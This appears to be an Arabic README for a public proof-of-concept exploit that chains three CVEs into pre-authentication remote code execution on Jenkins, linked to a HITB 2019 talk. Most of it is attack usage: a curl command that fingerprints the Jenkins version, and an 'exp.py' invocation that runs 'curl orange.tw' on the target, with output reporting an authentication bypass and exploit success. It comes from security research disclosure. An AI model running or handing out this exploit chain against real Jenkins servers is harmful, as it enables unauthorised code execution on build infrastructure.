
لا توجد ثغرة RCE قبل المصادقة في Jenkins منذ مايو 2017، لكن هذه هي!
لا توجد ثغرة RCE قبل المصادقة في Jenkins منذ مايو 2017، لكن هذه هي الثغرة!
إنها تسلسل CVE-2018-1000861 وCVE-2019-1003005 وCVE-2019-1003029 لتحقيق تنفيذ تعليمات برمجية عن بُعد قبل المصادقة بشكل أكثر موثوقية وأناقة!
تعطيل ANONYMOUS_READ
تفعيل ANONYMOUS_READ (أو مع حساب مستخدم عادي)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
جزء من شرائح محاضرتي في HITB AMS 2019:
